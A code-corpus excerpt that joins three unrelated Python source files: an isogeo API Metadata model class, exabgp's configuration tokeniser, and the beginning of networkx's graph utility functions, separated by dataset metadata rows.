"_id": "string (uuid)",
"description": "string",
"license": {
"_id": "string (uuid)",
"content": "string",
"count": "integer (int32)",
"link": "string",
"name": "string"
}
}
],
"contacts": [
{
"_id": "string (uuid)",
"contact": {
"_created": "string (date-time)",
"_id": "string (uuid)",
"_modified": "string (date-time)",
"addressLine1": "string",
"addressLine2": "string",
"addressLine3": "string",
"available": "string",
"city": "string",
"count": "integer (int32)",
"countryCode": "string",
"email": "string",
"fax": "string",
"hash": "string",
"name": "string",
"organization": "string",
"phone": "string",
"type": "string",
"zipCode": "string"
},
"role": "string"
}
],
"context": "object",
"coordinate-system": "object",
"created": "string (date-time)",
"distance": "number (double)",
"editionProfile": "string",
"encoding": "string",
"envelope": "object",
"features": "integer (int32)",
"format": "string",
"formatVersion": "string",
"geometry": "string",
"height": "integer (int32)",
"keywords": [
{}
]
}
"""
# -- ATTRIBUTES --------------------------------------------------------------------
ATTR_TYPES = {
"_abilities": list,
"_created": str,
"_creator": dict,
"_id": str,
"_modified": str,
"abstract": str,
"collectionContext": str,
"collectionMethod": str,
"conditions": list,
"contacts": list,
"coordinateSystem": dict,
"created": str,
"distance": float,
"editionProfile": str,
"encoding": str,
"envelope": dict,
"events": list,
"featureAttributes": list,
"features": int,
"format": str,
"formatVersion": str,
"geometry": str,
"keywords": list,
"language": str,
"layers": list,
"limitations": list,
"links": list,
"modified": str,
"name": str,
"operations": list,
"path": str,
"precision": str,
"published": str,
"scale": int,
"series": bool,
"serviceLayers": list,
"specifications": list,
"tags": list,
"title": str,
"topologicalConsistency": str,
"type": str,
"updateFrequency": str,
"validFrom": str,
"validTo": str,
"validityComment": str,
}
ATTR_CREA = {
"abstract": str,
"collectionContext": str,
"collectionMethod": str,
"distance": float,
"editionProfile": str,
"encoding": str,
"envelope": dict,
"features": int,
"format": str,
"formatVersion": str,
"geometry": str,
"language": str,
"name": str,
"path": str,
"precision": str,
"scale": int,
"series": bool,
"title": str,
"topologicalConsistency": str,
"type": str,
"updateFrequency": str,
"validFrom": str,
"validTo": str,
"validityComment": str,
}
ATTR_MAP = {
"coordinateSystem": "coordinate-system",
"featureAttributes": "feature-attributes",
}
# -- CLASS METHODS -----------------------------------------------------------------
@classmethod
def clean_attributes(cls, raw_object: dict):
"""Renames attributes which are incompatible with Python (hyphens...).
See related issue: https://github.com/isogeo/isogeo-api-py-minsdk/issues/82
:param dict raw_object: metadata dictionary returned by a request.json()
:returns: the metadata with correct attributes
:rtype: Metadata
"""
for k, v in cls.ATTR_MAP.items():
raw_object[k] = raw_object.pop(v, [])
return cls(**raw_object)
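# A hedged illustration of the renaming above (input dict is invented):
#
#   raw = {"_id": "md-uuid", "coordinate-system": {"code": "EPSG:4326"},
#          "feature-attributes": []}
#   md = Metadata.clean_attributes(raw)
#   # md.coordinateSystem == {"code": "EPSG:4326"}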
# -- CLASS INSTANTIATION ----------------------------------------------------------
def __init__(
self,
_abilities: list = None,
_created: str = None,
_creator: dict = None,
_id: str = None,
_modified: str = None,
abstract: str = None,
collectionContext: str = None,
collectionMethod: str = None,
conditions: list = None,
contacts: list = None,
coordinateSystem: dict = None,
created: str = None,
distance: float = None,
editionProfile: str = None,
encoding: str = None,
envelope: dict = None,
events: list = None,
featureAttributes: list = None,
features: int = None,
format: str = None,
formatVersion: str = None,
geometry: str = None,
keywords: list = None,
language: str = None,
layers: list = None,
limitations: list = None,
links: list = None,
modified: str = None,
name: str = None,
operations: list = None,
path: str = None,
precision: str = None,
published: str = None,
scale: int = None,
series: bool = None,
serviceLayers: list = None,
specifications: list = None,
tags: list = None,
title: str = None,
topologicalConsistency: str = None,
type: str = None,
updateFrequency: str = None,
validFrom: str = None,
validTo: str = None,
validityComment: str = None,
):
"""Metadata model"""
# default values for the object attributes/properties
self.__abilities = None
self.__created = None
self.__creator = None
self.__id = None
self.__modified = None
self._abstract = None
self._collectionContext = None
self._collectionMethod = None
self._conditions = None
self._contacts = None
self._coordinateSystem = None
self._creation = None # = created
self._distance = None
self._editionProfile = None
self._encoding = None
self._envelope = None
self._events = None
self._featureAttributes = None
self._features = None
self._format = None
self._formatVersion = None
self._geometry = None
self._keywords = None
self._language = None
self._layers = None
self._limitations = None
self._links = None
self._modification = None # = modified
self._name = None
self._operations = None
self._path = None
self._precision = None
self._published = None
self._scale = None
self._series = None
self._serviceLayers = None
self._specifications = None
self._tags = None
self._title = None
self._topologicalConsistency = None
self._type = None
self._updateFrequency = None
self._validFrom = None
self._validTo = None
self._validityComment = None
# if values have been passed, so use them as objects attributes.
# attributes are prefixed by an underscore '_'
if _abilities is not None:
self.__abilities = _abilities
if _created is not None:
self.__created = _created
if _creator is not None:
self.__creator = _creator
if _id is not None:
self.__id = _id
if _modified is not None:
self.__modified = _modified
if abstract is not None:
self._abstract = abstract
if collectionContext is not None:
self._collectionContext = collectionContext
if collectionMethod is not None:
self._collectionMethod = collectionMethod
if conditions is not None:
self._conditions = conditions
if contacts is not None:
self._contacts = contacts
if coordinateSystem is not None:
self._coordinateSystem = coordinateSystem
if created is not None:
self._creation = created
if distance is not None:
self._distance = distance
if editionProfile is not None:
self._editionProfile = editionProfile
if encoding is not None:
self._encoding = encoding
if envelope is not None:
self._envelope = envelope
if events is not None:
self._events = events
if featureAttributes is not None:
self._featureAttributes = featureAttributes
if features is not None:
self._features = features
if format is not None:
self._format = format
if formatVersion is not None:
self._formatVersion = formatVersion
if geometry is not None:
self._geometry = geometry
if keywords is not None:
self._keywords = keywords
if language is not None:
self._language = language
if layers is not None:
self._layers = layers
if limitations is not None:
self._limitations = limitations
if links is not None:
self._links = links
if modified is not None:
self._modification = modified
if name is not None:
self._name = name
if operations is not None:
self._operations = operations
if path is not None:
self._path = path
if precision is not None:
self._precision = precision
if published is not None:
self._published = published
if scale is not None:
self._scale = scale
if serviceLayers is not None:
self._serviceLayers = serviceLayers
if specifications is not None:
self._specifications = specifications
if tags is not None:
self._tags = tags
if title is not None:
self._title = title
if topologicalConsistency is not None:
self._topologicalConsistency = topologicalConsistency
if type is not None:
self._type = type
if updateFrequency is not None:
self._updateFrequency = updateFrequency
if validFrom is not None:
self._validFrom = validFrom
if validTo is not None:
self._validTo = validTo
if validityComment is not None:
self._validityComment = validityComment
# -- PROPERTIES --------------------------------------------------------------------
# abilities of the user related to the metadata
@property
def _abilities(self) -> list:
"""Gets the abilities of this Metadata.
:return: The abilities of this Metadata.
:rtype: list
"""
return self.__abilities
# _created
@property
def _created(self) -> str:
"""Gets the creation datetime of the Metadata.
Datetime format is: `%Y-%m-%dT%H:%M:%S+00:00`.
:return: The created of this Metadata.
:rtype: str
"""
return self.__created
# _modified
@property
def _modified(self) -> str:
"""Gets the last modification datetime of this Metadata.
Datetime format is: `%Y-%m-%dT%H:%M:%S+00:00`.
:return: The modified of this Metadata.
:rtype: str
"""
return self.__modified
# metadata owner
@property
def _creator(self) -> dict:
"""Gets the creator of this Metadata.
:return: The creator of this Metadata.
:rtype: dict
"""
return self.__creator
# metadata UUID
@property
def _id(self) -> str:
"""Gets the id of this Metadata.
:return: The id of this Metadata.
:rtype: str
"""
return self.__id
@_id.setter
def _id(self, _id: str):
"""Sets the id of this Metadata.
:param str id: The id of this Metadata.
"""
self.__id = _id
# metadata description
@property
def abstract(self) -> str:
"""Gets the abstract.
:return: The abstract of this Metadata.
:rtype: str
"""
return self._abstract
@abstract.setter
def abstract(self, abstract: str):
"""Sets the abstract used into Isogeo filters of this Metadata.
:param str abstract: the abstract of this Metadata.
"""
self._abstract = abstract
# collection context
@property
def collectionContext(self) -> str:
"""Gets the collectionContext of this Metadata.
:return: The collectionContext of this Metadata.
:rtype: str
"""
return self._collectionContext
@collectionContext.setter
def collectionContext(self, collectionContext: str):
"""Sets the collection context of this Metadata.
:param str collectionContext: The collection context of this Metadata.
"""
self._collectionContext = collectionContext
# collection method
@property
def collectionMethod(self) -> str:
"""Gets the collection method of this Metadata.
:return: The collection method of this Metadata.
:rtype: str
"""
return self._collectionMethod
@collectionMethod.setter
def collectionMethod(self, collectionMethod: str):
"""Sets the collection method of this Metadata.
:param str collectionMethod: the collection method to set. Accepts markdown.
"""
self._collectionMethod = collectionMethod
# CGUs
@property
def conditions(self) -> list:
"""Gets the conditions of this Metadata.
:return: The conditions of this Metadata.
:rtype: list
"""
return self._conditions
@conditions.setter
def conditions(self, conditions: list):
"""Sets conditions of this Metadata.
:param list conditions: conditions to be set
"""
self._conditions = conditions
# contacts
@property
def contacts(self) -> list:
"""Gets the contacts of this Metadata.
:return: The contacts of this Metadata.
:rtype: list
"""
return self._contacts
@contacts.setter
def contacts(self, contacts: list):
"""Sets the of this Metadata.
:param list contacts: to be set
"""
self._contacts = contacts
# coordinateSystem
@property
def coordinateSystem(self) -> dict:
"""Gets the coordinateSystem of this Metadata.
:return: The coordinateSystem of this Metadata.
:rtype: dict
"""
return self._coordinateSystem
@coordinateSystem.setter
def coordinateSystem(self, coordinateSystem: dict):
"""Sets the coordinate systems of this Metadata.
:param dict coordinateSystem: to be set
"""
self._coordinateSystem = coordinateSystem
# created
@property
def created(self) -> str:
"""Gets the creation date of the data described by the Metadata.
It's the equivalent of the `created` original attribute (renamed to avoid conflicts with the `_created` one).
Date format is: `%Y-%m-%dT%H:%M:%S+00:00`.
:return: The creation of this Metadata.
:rtype: str
"""
return self._creation
# distance
@property
def distance(self) -> float:
"""Gets the distance of this Metadata.
:return: The distance of this Metadata.
:rtype: float
"""
return self._distance
@distance.setter
def distance(self, distance: float):
"""Sets the distance of this Metadata.
:param float distance: to be set
"""
self._distance = distance
# editionProfile
@property
def editionProfile(self) -> str:
"""Gets the editionProfile of this Metadata.
:return: The editionProfile of this Metadata.
:rtype: str
"""
return self._editionProfile
@editionProfile.setter
def editionProfile(self, editionProfile: str):
"""Sets the of this Metadata.
:param str editionProfile: to be set
"""
self._editionProfile = editionProfile
# encoding
@property
def encoding(self) -> str:
"""Gets the encoding of this Metadata.
:return: The encoding of this Metadata.
:rtype: str
"""
return self._encoding
@encoding.setter
def encoding(self, encoding: str):
"""Sets the of this Metadata.
:param str encoding: to be set
"""
self._encoding = encoding
# envelope
@property
def envelope(self) -> str:
"""Gets the envelope of this Metadata.
:return: The envelope of this Metadata.
:rtype: str
"""
return self._envelope
@envelope.setter
def envelope(self, envelope: str):
"""Sets the of this Metadata.
:param str envelope: to be set
"""
self._envelope = envelope
# events
@property
def events(self) -> list:
"""Gets the events of this Metadata.
:return: The events of this Metadata.
:rtype: list
"""
return self._events
@events.setter
def events(self, events: list):
"""Sets the of this Metadata.
:param list events: to be set
"""
self._events = events
# featureAttributes
@property
def featureAttributes(self) -> list:
"""Gets the featureAttributes of this Metadata.
:return: The featureAttributes of this Metadata.
:rtype: list
"""
return self._featureAttributes
@featureAttributes.setter
def featureAttributes(self, featureAttributes: list):
"""Sets the of this Metadata.
:param list featureAttributes: to be set
"""
self._featureAttributes = featureAttributes
# features
@property
def features(self) -> int:
"""Gets the features of this Metadata.
:return: The features of this Metadata.
:rtype: int
"""
return self._features
@features.setter
def features(self, features: int):
"""Sets the of this Metadata.
:param int features: to be set
"""
self._features = features
# format
@property
def format(self) -> str:
"""Gets the format of this Metadata.
:return: The format of this Metadata.
:rtype: str
"""
return self._format
@format.setter
def format(self, format: str):
"""Sets the of this Metadata.
:param str format: to be set
"""
self._format = format
# formatVersion
@property
def formatVersion(self) -> str:
"""Gets the formatVersion of this Metadata.
:return: The formatVersion of this Metadata.
:rtype: str
"""
return self._formatVersion
@formatVersion.setter
def formatVersion(self, formatVersion: str):
"""Sets the of this Metadata.
:param str formatVersion: to be set
"""
self._formatVersion = formatVersion
# geometry
@property
def geometry(self) -> str:
"""Gets the geometry of this Metadata.
:return: The geometry of this Metadata.
:rtype: str
"""
return self._geometry
@geometry.setter
def geometry(self, geometry: str):
"""Sets the of this Metadata.
:param str geometry: to be set
"""
self._geometry = geometry
# keywords
@property
def keywords(self) -> str:
"""Gets the keywords of this Metadata.
:return: The keywords of this Metadata.
:rtype: str
"""
return self._keywords
@keywords.setter
def keywords(self, keywords: str):
"""Sets the of this Metadata.
:param str keywords: to be set
"""
self._keywords = keywords
# language
@property
def language(self) -> str:
"""Gets the language of this Metadata.
:return: The language of this Metadata.
:rtype: str
"""
return self._language
@language.setter
def language(self, language: str):
"""Sets the of this Metadata.
:param str language: to be set
"""
self._language = language
# layers
@property
def layers(self) -> list:
"""Gets the layers of this Metadata.
:return: The layers of this Metadata.
:rtype: list
"""
return self._layers
@layers.setter
def layers(self, layers: list):
"""Sets the of this Metadata.
:param list layers: to be set
"""
self._layers = layers
# limitations
@property
def limitations(self) -> str:
"""Gets the limitations of this Metadata.
:return: The limitations of this Metadata.
:rtype: str
"""
return self._limitations
@limitations.setter
def limitations(self, limitations: str):
"""Sets the of this Metadata.
:param str limitations: to be set
"""
self._limitations = limitations
# links
@property
def links(self) -> str:
"""Gets the links of this Metadata.
:return: The links of this Metadata.
:rtype: str
"""
return self._links
@links.setter
def links(self, links: str):
"""Sets the of this Metadata.
:param str links: to be set
"""
self._links = links
# modification
@property
def modified(self) -> str:
"""Gets the last modification date of the data described by this Metadata.
It's the equivalent of the `modified` original attribute (renamed to avoid conflicts with the `_modified` one).
:return: The modification of this Metadata.
:rtype: str
"""
return self._modification
# name
@property
def name(self) -> str:
"""Gets the name of this Metadata.
:return: The name of this Metadata.
:rtype: str
"""
return self._name
@name.setter
def name(self, name: str):
"""Sets technical name of the Metadata.
:param str name: technical name this Metadata.
"""
self._name = name
# operations
@property
def operations(self) -> list:
"""Gets the operations of this Metadata.
:return: The operations of this Metadata.
:rtype: list
"""
return self._operations
@operations.setter
def operations(self, operations: list):
"""Sets the of this Metadata.
:param list operations: to be set
"""
self._operations = operations
# path
@property
def path(self) -> str:
"""Gets the path of this Metadata.
:return: The path of this Metadata.
:rtype: str
"""
return self._path
@path.setter
def path(self, path: str):
"""Sets the of this Metadata.
:param str path: to be set
"""
self._path = path
# precision
@property
def precision(self) -> str:
"""Gets the precision of this Metadata.
:return: The precision of this Metadata.
:rtype: str
"""
return self._precision
@precision.setter
def precision(self, precision: str):
"""Sets the of this Metadata.
:param str precision: to be set
"""
self._precision = precision
# published
@property
def published(self) -> str:
"""Gets the published of this Metadata.
:return: The published of this Metadata.
:rtype: str
"""
return self._published
@published.setter
def published(self, published: str):
"""Sets the of this Metadata.
:param str published: to be set
"""
self._published = published
# scale
@property
def scale(self) -> str:
"""Gets the scale of this Metadata.
:return: The scale of this Metadata.
:rtype: str
"""
return self._scale
@scale.setter
def scale(self, scale: str):
"""Sets the of this Metadata.
:param str scale: to be set
"""
self._scale = scale
# series
@property
def series(self) -> str:
"""Gets the series of this Metadata.
:return: The series of this Metadata.
:rtype: str
"""
return self._series
@series.setter
def series(self, series: str):
"""Sets the of this Metadata.
:param str series: to be set
"""
self._series = series
# serviceLayers
@property
def serviceLayers(self) -> list:
"""Gets the serviceLayers of this Metadata.
:return: The serviceLayers of this Metadata.
:rtype: list
"""
return self._serviceLayers
@serviceLayers.setter
def serviceLayers(self, serviceLayers: list):
"""Sets the of this Metadata.
:param list serviceLayers: to be set
"""
self._serviceLayers = serviceLayers
# specifications
@property
def specifications(self) -> str:
"""Gets the specifications of this Metadata.
:return: The specifications of this Metadata.
:rtype: str
"""
return self._specifications
@specifications.setter
def specifications(self, specifications: str):
"""Sets the of this Metadata.
:param str specifications: to be set
"""
self._specifications = specifications
# tags
@property
def tags(self) -> str:
"""Gets the tags of this Metadata.
:return: The tags of this Metadata.
:rtype: str
"""
return self._tags
@tags.setter
def tags(self, tags: str):
"""Sets the of this Metadata.
:param str tags: to be set
"""
self._tags = tags
# title
@property
def title(self) -> str:
"""Gets the title of this Metadata.
:return: The title of this Metadata.
:rtype: str
"""
return self._title
@title.setter
def title(self, title: str):
"""Sets the of this Metadata.
:param str title: to be set
"""
self._title = title
# topologicalConsistency
@property
def topologicalConsistency(self) -> str:
"""Gets the topologicalConsistency of this Metadata.
:return: The topologicalConsistency of this Metadata.
:rtype: str
"""
return self._topologicalConsistency
@topologicalConsistency.setter
def topologicalConsistency(self, topologicalConsistency: str):
"""Sets the of this Metadata.
:param str topologicalConsistency: to be set
"""
self._topologicalConsistency = topologicalConsistency
# type
@property
def type(self) -> str:
"""Gets the type of this Metadata.
:return: The type of this Metadata.
:rtype: str
"""
return self._type
@type.setter
def type(self, type: str):
"""Sets the type of this Metadata.
:param str type: The type of this Metadata.
"""
# check type value
if type not in MetadataTypes.__members__:
raise ValueError(
"Metadata type '{}' is not an accepted value. Must be one of: {}.".format(
type, " | ".join([e.name for e in MetadataTypes])
)
)
self._type = type
# updateFrequency
@property
def updateFrequency(self) -> str:
"""Gets the updateFrequency of this Metadata.
:return: The updateFrequency of this Metadata.
:rtype: str
"""
return self._updateFrequency
@updateFrequency.setter
def updateFrequency(self, updateFrequency: str):
"""Sets the of this Metadata.
:param str updateFrequency: to be set
"""
self._updateFrequency = updateFrequency
# validFrom
@property
def validFrom(self) -> str:
"""Gets the validFrom of this Metadata.
:return: The validFrom of this Metadata.
:rtype: str
"""
return self._validFrom
@validFrom.setter
def validFrom(self, validFrom: str):
"""Sets the of this Metadata.
:param str validFrom: to be set
"""
self._validFrom = validFrom
# validTo
@property
def validTo(self) -> str:
"""Gets the validTo of this Metadata.
:return: The validTo of this Metadata.
:rtype: str
"""
return self._validTo
@validTo.setter
def validTo(self, validTo: str):
"""Sets the of this Metadata.
:param str validTo: to be set
"""
self._validTo = validTo
# validityComment
@property
def validityComment(self) -> str:
"""Gets the validityComment of this Metadata.
:return: The validityComment of this Metadata.
:rtype: str
"""
return self._validityComment
@validityComment.setter
def validityComment(self, validityComment: str):
"""Sets the of this Metadata.
:param str validityComment: to be set
"""
self._validityComment = validityComment
# -- SPECIFIC TO IMPLEMENTATION ----------------------------------------------------
@property
def groupName(self) -> str:
"""Shortcut to get the name of the workgroup which owns the Metadata."""
if isinstance(self._creator, dict):
return self._creator.get("contact").get("name")
elif isinstance(self._creator, Workgroup):
return self._creator.contact.get("name")
else:
return None
@property
def groupId(self) -> str:
"""Shortcut to get the UUID of the workgroup which owns the Metadata."""
if isinstance(self._creator, dict):
return self._creator.get("_id")
elif isinstance(self._creator, Workgroup):
return self._creator._id
else:
return None
# -- METHODS -----------------------------------------------------------------------
def admin_url(self, url_base: str = "https://app.isogeo.com") -> str:
"""Returns the administration URL (https://app.isogeo.com) for this metadata.
:param str url_base: base URL of admin site. Defaults to: https://app.isogeo.com
:rtype: str
"""
if self._creator is None:
logger.warning("Creator is required to build admin URL")
return False
creator_id = self._creator.get("_id")
return "{}/groups/{}/resources/{}/".format(url_base, creator_id, self._id)
def title_or_name(self, slugged: bool = False) -> str:
"""Gets the title of this Metadata or the name if there is no title.
It can return a slugified value.
:param bool slugged: slugify title. Defaults to `False`.
:returns: the title or the name of this Metadata.
:rtype: str
"""
if self._title:
title_or_name = self._title
else:
title_or_name = self._name
# slugify
if slugged:
title_or_name = (
unicodedata.normalize("NFKD", title_or_name)
.encode("ascii", "ignore")
.decode("ascii")
)
title_or_name = _regex_slugify_strip.sub("", title_or_name).strip().lower()
title_or_name = _regex_slugify_hyphenate.sub("-", title_or_name)
return title_or_name
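# A small assumed example of the slugify path (values invented):
#
#   md = Metadata(title="Réseau routier - 2019")
#   md.title_or_name(slugged=True)   # -> 'reseau-routier-2019'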
def to_dict(self) -> dict:
"""Returns the model properties as a dict"""
result = {}
for attr, _ in self.ATTR_TYPES.items():
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(
map(lambda x: x.to_dict() if hasattr(x, "to_dict") else x, value)
)
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(
map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict")
else item,
value.items(),
)
)
else:
result[attr] = value
if issubclass(Metadata, dict):
for key, value in self.items():
result[key] = value
return result
def to_dict_creation(self) -> dict:
"""Returns the model properties as a dict structured for creation purpose (POST)"""
result = {}
for attr, _ in self.ATTR_CREA.items():
# get attribute value
value = getattr(self, attr)
# switch attribute name for creation purpose
if attr in self.ATTR_MAP:
attr = self.ATTR_MAP.get(attr)
if isinstance(value, list):
result[attr] = list(
map(lambda x: x.to_dict() if hasattr(x, "to_dict") else x, value)
)
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(
map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict")
else item,
value.items(),
)
)
else:
result[attr] = value
if issubclass(Metadata, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self) -> str:
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self) -> str:
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other) -> bool:
"""Returns true if both objects are equal"""
if not isinstance(other, Metadata):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other) -> bool:
"""Returns true if both objects are not equal"""
return not self == other
# ##############################################################################
# ##### Stand alone program ########
# ##################################
if __name__ == "__main__":
""" standalone execution """
md = Metadata()
print(md)
|
gpl-3.0
| 639,171,598,854,724,600
| 26.235252
| 116
| 0.522886
| false
| 4.686888
| false
| false
| false
|
lochiiconnectivity/exabgp
|
lib/exabgp/configuration/engine/tokeniser.py
|
1
|
3330
|
# encoding: utf-8
"""
tokeniser.py
Created by Thomas Mangin on 2014-06-22.
Copyright (c) 2014-2015 Exa Networks. All rights reserved.
"""
from exabgp.util import coroutine
from exabgp.configuration.engine.location import Location
from exabgp.configuration.engine.raised import Raised
# convert special characters
@coroutine.join
def unescape (s):
start = 0
while start < len(s):
pos = s.find('\\', start)
if pos == -1:
yield s[start:]
break
yield s[start:pos]
pos += 1
esc = s[pos]
if esc == 'b':
yield '\b'
elif esc == 'f':
yield '\f'
elif esc == 'n':
yield '\n'
elif esc == 'r':
yield '\r'
elif esc == 't':
yield '\t'
elif esc == 'u':
yield chr(int(s[pos + 1:pos + 5], 16))
pos += 4
else:
yield esc
start = pos + 1
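# A quick hedged illustration of unescape (inputs invented):
#
#   unescape('line\\none\\ttab')   # -> 'line\none\ttab'
#   unescape('caf\\u00e9')         # -> 'café'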
# A coroutine which returns the next token from the stream, or the string if quoted
@coroutine.each
def tokens (stream):
spaces = [' ','\t','\r','\n']
strings = ['"', "'"]
syntax = [',','[',']','{','}']
comment = ['#',]
nb_lines = 0
for line in stream:
nb_lines += 1
nb_chars = 0
quoted = ''
word = ''
for char in line:
if char in comment:
if quoted:
word += char
nb_chars += 1
else:
if word:
yield nb_lines,nb_chars-len(word),line,word
word = ''
break
elif char in syntax:
if quoted:
word += char
else:
if word:
yield nb_lines,nb_chars-len(word),line,word
word = ''
yield nb_lines,nb_chars,line,char
nb_chars += 1
elif char in spaces:
if quoted:
word += char
elif word:
yield nb_lines,nb_chars-len(word),line,word
word = ''
nb_chars += 1
elif char in strings:
word += char
if quoted == char:
quoted = ''
yield nb_lines,nb_chars-len(word),line,word
word = ''
else:
quoted = char
nb_chars += 1
else:
word += char
nb_chars += 1
# ==================================================================== Tokeniser
# Return the next token from the configuration
class Tokeniser (Location):
def __init__ (self,name,stream):
super(Tokeniser,self).__init__()
self.name = name  # A unique name for this tokeniser, so we can have multiple
self.tokeniser = tokens(stream)  # A coroutine giving us the next token
self._rewind = []  # Should we want to rewind, the list of tokens to pop first
def __call__ (self):
if self._rewind:
return self._rewind.pop()
token = self.content(self.tokeniser)
return token
# XXX: FIXME: line and position only work if we only rewind one element
def rewind (self,token):
self._rewind.append(token)
def content (self,producer):
try:
while True:
self.idx_line,self.idx_column,self.line,token = producer()
if token == '[':
returned = []
for token in self.iterate_list(producer):
returned.append((self.idx_line,self.idx_column,self.line,token))
return returned
elif token[0] in ('"',"'"):
return unescape(token[1:-1])
else:
return token
except ValueError:
raise Raised(Location(self.idx_line,self.idx_column,self.line),'Could not parse %s' % str(token))
except StopIteration:
return None
def iterate_list (self,producer):
token = self.content(producer)
while token and token != ']':
yield token
token = self.content(producer)
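# A hedged usage sketch (stream contents invented): the Tokeniser walks a
# configuration stream token by token and can rewind one token.
#
#   stream = iter(['neighbor 192.0.2.1 {\n', '"local-as" 65000\n', '}\n'])
#   t = Tokeniser('example', stream)
#   t()   # -> 'neighbor'
#   t()   # -> '192.0.2.1'
#   t.rewind('192.0.2.1')
#   t()   # -> '192.0.2.1' again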
|
bsd-3-clause
| -4,720,082,603,888,199,000
| 22.125
| 100
| 0.597297
| false
| 3.094796
| false
| false
| false
|
tmilicic/networkx
|
networkx/classes/function.py
|
1
|
16409
|
"""Functional interface to graph methods and assorted utilities.
"""
# Copyright (C) 2004-2015 by
# Aric Hagberg <hagberg@lanl.gov>
# Dan Schult <dschult@colgate.edu>
# Pieter Swart <swart@lanl.gov>
# All rights reserved.
# BSD license.
#
import networkx as nx
from networkx.utils import not_implemented_for
import itertools
__author__ = """\n""".join(['Aric Hagberg (hagberg@lanl.gov)',
'Pieter Swart (swart@lanl.gov)',
'Dan Schult(dschult@colgate.edu)'])
__all__ = ['nodes', 'edges', 'degree', 'degree_histogram', 'neighbors',
'number_of_nodes', 'number_of_edges', 'density',
'is_directed', 'info', 'freeze', 'is_frozen', 'subgraph',
'create_empty_copy', 'set_node_attributes',
'get_node_attributes', 'set_edge_attributes',
'get_edge_attributes', 'all_neighbors', 'non_neighbors',
'non_edges', 'common_neighbors', 'is_weighted',
'is_negatively_weighted', 'is_empty']
def nodes(G):
"""Return an iterator over the graph nodes."""
return G.nodes()
def edges(G,nbunch=None):
"""Return iterator over edges incident to nodes in nbunch.
Return all edges if nbunch is unspecified or nbunch=None.
For digraphs, edges=out_edges
"""
return G.edges(nbunch)
def degree(G,nbunch=None,weight=None):
"""Return degree of single node or of nbunch of nodes.
If nbunch is omitted, then return degrees of *all* nodes.
"""
return G.degree(nbunch,weight)
def neighbors(G,n):
"""Return a list of nodes connected to node n. """
return G.neighbors(n)
def number_of_nodes(G):
"""Return the number of nodes in the graph."""
return G.number_of_nodes()
def number_of_edges(G):
"""Return the number of edges in the graph. """
return G.number_of_edges()
def density(G):
r"""Return the density of a graph.
The density for undirected graphs is
.. math::
d = \frac{2m}{n(n-1)},
and for directed graphs is
.. math::
d = \frac{m}{n(n-1)},
where `n` is the number of nodes and `m` is the number of edges in `G`.
Notes
-----
The density is 0 for a graph without edges and 1 for a complete graph.
The density of multigraphs can be higher than 1.
Self loops are counted in the total number of edges so graphs with self
loops can have density higher than 1.
"""
n=number_of_nodes(G)
m=number_of_edges(G)
if m==0 or n <= 1:
d=0.0
else:
if G.is_directed():
d=m/float(n*(n-1))
else:
d= m*2.0/float(n*(n-1))
return d
def degree_histogram(G):
"""Return a list of the frequency of each degree value.
Parameters
----------
G : Networkx graph
A graph
Returns
-------
hist : list
A list of frequencies of degrees.
The degree values are the index in the list.
Notes
-----
Note: the bins are width one, hence len(list) can be large
(Order(number_of_edges))
"""
# We need to make degseq list because we call it twice.
degseq = list(d for n, d in G.degree())
dmax = max(degseq) + 1
freq = [ 0 for d in range(dmax) ]
for d in degseq:
freq[d] += 1
return freq
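# A short assumed illustration (a path graph on four nodes has degrees
# 1, 2, 2, 1, so two nodes of degree 1 and two of degree 2):
#
#   >>> G = nx.path_graph(4)
#   >>> nx.degree_histogram(G)
#   [0, 2, 2]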
def is_directed(G):
""" Return True if graph is directed."""
return G.is_directed()
def frozen(*args):
"""Dummy method for raising errors when trying to modify frozen graphs"""
raise nx.NetworkXError("Frozen graph can't be modified")
def freeze(G):
"""Modify graph to prevent further change by adding or removing
nodes or edges.
Node and edge data can still be modified.
Parameters
----------
G : graph
A NetworkX graph
Examples
--------
>>> G=nx.Graph()
>>> G.add_path([0,1,2,3])
>>> G=nx.freeze(G)
>>> try:
... G.add_edge(4,5)
... except nx.NetworkXError as e:
... print(str(e))
Frozen graph can't be modified
Notes
-----
To "unfreeze" a graph you must make a copy by creating a new graph object:
>>> graph = nx.path_graph(4)
>>> frozen_graph = nx.freeze(graph)
>>> unfrozen_graph = nx.Graph(frozen_graph)
>>> nx.is_frozen(unfrozen_graph)
False
See Also
--------
is_frozen
"""
G.add_node=frozen
G.add_nodes_from=frozen
G.remove_node=frozen
G.remove_nodes_from=frozen
G.add_edge=frozen
G.add_edges_from=frozen
G.remove_edge=frozen
G.remove_edges_from=frozen
G.clear=frozen
G.frozen=True
return G
def is_frozen(G):
"""Return True if graph is frozen.
Parameters
----------
G : graph
A NetworkX graph
See Also
--------
freeze
"""
try:
return G.frozen
except AttributeError:
return False
def subgraph(G, nbunch):
"""Return the subgraph induced on nodes in nbunch.
Parameters
----------
G : graph
A NetworkX graph
nbunch : list, iterable
A container of nodes that will be iterated through once (thus
it should be an iterator or be iterable). Each element of the
container should be a valid node type: any hashable type except
None. If nbunch is None, the subgraph induced on all nodes is returned.
Nodes in nbunch that are not in the graph will be (quietly)
ignored.
Notes
-----
subgraph(G) calls G.subgraph()
"""
return G.subgraph(nbunch)
def create_empty_copy(G,with_nodes=True):
"""Return a copy of the graph G with all of the edges removed.
Parameters
----------
G : graph
A NetworkX graph
with_nodes : bool (default=True)
Include nodes.
Notes
-----
Graph, node, and edge data is not propagated to the new graph.
"""
H=G.__class__()
if with_nodes:
H.add_nodes_from(G)
return H
def info(G, n=None):
"""Print short summary of information for the graph G or the node n.
Parameters
----------
G : Networkx graph
A graph
n : node (any hashable)
A node in the graph G
"""
info='' # append this all to a string
if n is None:
info+="Name: %s\n"%G.name
type_name = [type(G).__name__]
info+="Type: %s\n"%",".join(type_name)
info+="Number of nodes: %d\n"%G.number_of_nodes()
info+="Number of edges: %d\n"%G.number_of_edges()
nnodes=G.number_of_nodes()
if len(G) > 0:
if G.is_directed():
info+="Average in degree: %8.4f\n"%\
